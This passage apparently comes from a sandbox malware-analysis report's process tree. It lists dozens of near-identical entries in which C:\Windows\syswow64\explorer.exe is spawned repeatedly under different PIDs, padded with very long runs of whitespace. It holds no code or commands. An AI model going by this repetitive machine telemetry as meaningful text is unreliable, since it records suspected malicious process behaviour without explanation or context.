                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
